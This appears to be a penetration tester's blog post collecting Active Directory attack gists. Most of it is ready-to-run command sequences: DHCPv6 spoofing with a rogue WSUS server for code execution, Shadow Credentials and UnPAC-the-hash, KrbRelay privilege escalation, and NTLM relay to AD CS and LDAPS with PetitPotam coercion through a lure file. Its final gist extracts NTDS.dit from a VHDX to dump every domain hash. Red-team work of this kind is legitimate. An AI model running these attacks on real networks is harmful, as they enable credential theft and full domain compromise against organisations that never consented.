# tl;dr This post is a collection of `Active Directory` abuse gists that I plan on updating with any techniques I had a chance to use on a real-life engagement. Also available on GitHub: **[github link](https://github.com/zimnyaa)** --- ## ./ad/dhcpv6-wsus.sh (thanks cr7pt0pl4gu3!) ```shell # checking WSUS preferences PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer ### after setting up the attack, click the "Check for updates" button ### set up DHCPv6 spoofing git clone https://github.com/RedTeamPentesting/pretender.git cd pretender sudo ./pretender -i eth0 --spoof wsus.lab.local ### setting up the IPv6 PyWSUS fork git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git cd pywsus-ipv6 sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"' ``` --- ## ./ad/shadowunpac.sh ```bash # getting the current ticket sliver (SESSION) > rubeus tgtdeleg /nowrap echo <ticket> | base64 --decode > ticket.kirbi ticketConverter.py ticket.kirbi ticket.ccache # adding msDS-KeyCredentialLink proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert # requesting a ticket with ShadowCredentials proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache # UnPAC the ST export KRB5CCNAME=dcagent.ccache proxychains4 python3 getnthash.py -key <key> "domain/dcagent" ``` --- ## ./ad/adcs_lab.ps1 ```powershell New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure $azureDefaultLocation = 'Australia East' # CHANGETHIS Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation # defining default parameter values, as these ones are the same for all the machines $PSDefaultParameterValues = @{ 'Add-LabMachineDefinition:DomainName' = 'contoso.com' 
'Add-LabMachineDefinition:Memory' = 8GB 'Add-LabMachineDefinition:OperatingSystem' = 'Windows Server 2016 Datacenter (Desktop Experience)' } Add-LabMachineDefinition -Name DC1 -Roles RootDC Add-LabMachineDefinition -Name CA1 -Roles CaRoot Add-LabMachineDefinition -Name Client1 -OperatingSystem 'Windows 10 Enterprise' Add-LabMachineDefinition -Name Client2 -OperatingSystem 'Windows 10 Enterprise' Install-Lab Enable-LabCertificateAutoenrollment -Computer -User -CodeSigning # AV is optional Invoke-LabCommand -ScriptBlock {Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))} -ComputerName Client2 -PassThru Invoke-LabCommand -ScriptBlock {Set-ExecutionPolicy Bypass -Scope Process -Force; choco install kis -y -force} -ComputerName Client2 -PassThru Show-LabDeploymentSummary -Detailed ``` --- ## ./ad/krbrelay_lpe.sh ```bash # creating an RPC server, relaying SYSTEM Kerberos authentication to LDAP # we will use Shadow Credentials instead of RBCD so as not to rely on ms-DS-MachineAccountQuota and to be a little more stealthy # clsid from cube0x0 KrbRelay repo .\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1 # KrbRelay outputs a Rubeus command for you, but you do not need to unPAC Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap # PTH to SMB is a spook, better request a ticket .\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap # decoding .kirbi for use on *nix echo <ticket> | base64 --decode > install.kirbi python3 ticketConverter.py install.kirbi install.ccache export KRB5CCNAME=install.ccache # adjusting the date and timezone to the domain's (alternatively, use faketime, but that didn't work for me for some reason) ntpdate dc1.contoso.com timedatectl set-timezone Europe/Chisinau # evil-winrm is better here; smbexec is used for demonstration purposes only python3 ./smbexec.py 
-k contoso.com/[email protected] -debug -no-pass ``` --- ## ./ad/unpac_adcs.sh ```bash # setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection # (somewhere custom) or NTLM hash farming python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support # ntlmrelayx ADCS outputs an unencrypted .pfx cat lowpriv.b64 | base64 --decode > lowpriv.pfx # dirkjanm PKINITTools; I previously had to patch impacket to output AES session keys python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v export KRB5CCNAME=lowpriv.ccache # decrypting the PAC blob python3 getnthash.py contoso.com/lowpriv -key <key> ``` --- ## ./ad/webclient_rbcd.sh ```bash # setting up a DNS record in the domain; the zone I required was found in ForestDNSZones python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local # setting up an LDAPS relay to grant RBCD to the computer account we have # in my case MAQ = 0, so I escalated on a domain workstation and used it sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da # PetitPotam to WebDAV with domain credentials (not patched) # DO NOT use the FQDN here python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER # if WebClient is not enabled, you will get error 0x7. 
You can try to enable it by viewing a .searchConnector-ms file from the server (if it's a terminal server, for example) or hosting it on a public share and waiting # Documents.searchConnector-ms example: # <?xml version="1.0" encoding="UTF-8"?> # <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector"> # <iconReference>imageres.dll,-1002</iconReference> # <description>Microsoft Outlook</description> # <isSearchOnlyItem>false</isSearchOnlyItem> # <includeInStartMenuScope>true</includeInStartMenuScope> # <iconReference>\\YOUR_IP@8080\whatever.ico</iconReference> # <templateInfo> # <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> # </templateInfo> # <simpleLocation> # <url>\\YOUR_IP@8080\whatever.ico</url> # </simpleLocation> # </searchConnectorDescription> # ccache obtained with Rubeus /tgtdeleg and converted with ticketConverter export KRB5CCNAME=ws.ccache impacket-getST -k -spn wsman/TARGETSERVER.DOMAIN.local -dc-ip DC_IP -impersonate domain_admin DOMAIN.local/MYWS\$ # after setting up a KDC krb5.conf as per evil-winrm install instructions export KRB5CCNAME=domain_admin.ccache evil-winrm -r DOMAIN.local -i TARGETSERVER.DOMAIN.local --spn wsman ``` --- ## ./ad/vhdx_on_a_share.sh ```bash # runs on kali out-of-the-box # this is not a ready-made script, more like a collection of commands # QEMU mounting a drive modprobe nbd max_part=16 qemu-nbd -c /dev/nbd0 filename.vhdx # look for the second partition, usually where the FS resides fdisk -l /dev/nbd0 # mount the second partition mount /dev/nbd0p2 /mnt/windows # copy SYSTEM (for the bootkey) and NTDS.dit cp /mnt/windows/Windows/System32/config/SYSTEM ~/SYSTEM cp /mnt/windows/Windows/System32/NTDS/ntds.dit ~/ntds.dit cd # do not bother with esedbexport, impacket can do everything for us impacket-secretsdump -ntds ~/ntds.dit -system ~/SYSTEM -hashes lmhash:nthash LOCAL -outfile hashes.txt ```